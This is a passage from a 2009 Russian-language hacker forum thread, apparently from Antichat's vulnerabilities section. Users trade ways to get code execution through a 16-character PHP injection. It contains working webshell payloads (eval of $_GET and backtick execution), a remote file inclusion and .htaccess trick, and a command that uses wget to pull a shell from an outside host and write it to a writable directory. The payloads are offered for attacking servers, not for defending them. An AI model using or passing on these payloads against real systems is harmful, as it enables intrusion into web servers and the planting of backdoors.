ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
Перезагрузить страницу 16 символов :(
   
 
Страница 2 из 2 < 1 2
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 08.07.2009, 21:19
Mr.Hardwar
Новичок
Регистрация: 20.09.2008
Сообщений: 3
Провел на форуме:
42073

Репутация: 0
По умолчанию
<?eval($_GET[a])?> получается больше 16-ти символов, а
<?eval($a)?> и <?include($a)?> ничо не инклудят, ни локальные файлы ни с других хостов. (в адр строку добавляю &a=mysite.ru/file.txt)
Это значит конец? 16 символов мало
 

  #12  
Старый 09.07.2009, 07:23
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию
Цитата:
Сообщение от Mr.Hardwar  
<?eval($_GET[a])?> получается больше 16-ти символов, а
<?eval($a)?> и <?include($a)?> ничо не инклудят, ни локальные файлы ни с других хостов. (в адр строку добавляю &a=mysite.ru/file.txt)
Это значит конец? 16 символов мало
http://mysite.ru/file.txt
По твоему запросу он инклюдит папку mysite.ru/file.txt а не удалённый сервер
 

  #13  
Старый 09.07.2009, 09:58
Mr.Hardwar
Новичок
Регистрация: 20.09.2008
Сообщений: 3
Провел на форуме:
42073

Репутация: 0
По умолчанию
c http результат тот же(
&a=http://mysite.ru/primer.php -выводится страница c Hacking attempt!

&a=http://mysite.ru/primer.txt -страница грузится но ничо не инклудится..пишется "Привет, !"
Последний раз редактировалось Mr.Hardwar; 09.07.2009 в 10:04..
 

  #14  
Старый 09.07.2009, 19:41
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию
Инклюдить он заинклюдить
Ну вот может бред.
в .htacces
Цитата:
AddType application/x-httpd-php .txt
На своём серваке.
 

  #15  
Старый 09.07.2009, 19:55
BlackSun
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345

Репутация: 4589


По умолчанию
8 байт <? `$a`;
14 байт <? `$_GET[a]`;
 

  #16  
Старый 09.07.2009, 22:02
Ch3ck
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
Провел на форуме:
5301021

Репутация: 1879


По умолчанию
Цитата:
Сообщение от BlackSun  
8 байт <? `$a`;
14 байт <? `$_GET[a]`;
Я тоже вчера пробовал... а дальше чего?
 

  #17  
Старый 09.07.2009, 22:11
BlackSun
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345

Репутация: 4589


По умолчанию
Цитата:
Сообщение от Ch3ck  
Я тоже вчера пробовал... а дальше чего?
Что значит "а дальше чего"? Дальше сливаем wget'ом и ему подобными шелл, наслаждаемся.

?a=wget+http://google.com/shell.txt если уж совсем не понятно.
 

  #18  
Старый 20.07.2009, 06:18
.::BARS::.
Постоянный
Регистрация: 13.10.2007
Сообщений: 347
Провел на форуме:
1345617

Репутация: 115
По умолчанию
хм.... а ничего если упапки нет прав на запись???? =))))
 

  #19  
Старый 20.07.2009, 07:13
BlackSun
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345

Репутация: 4589


По умолчанию
А тебя совершенно не волнует тот факт, что папок все же больше одной? --output-document=
 
 
Страница 2 из 2 < 1 2



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ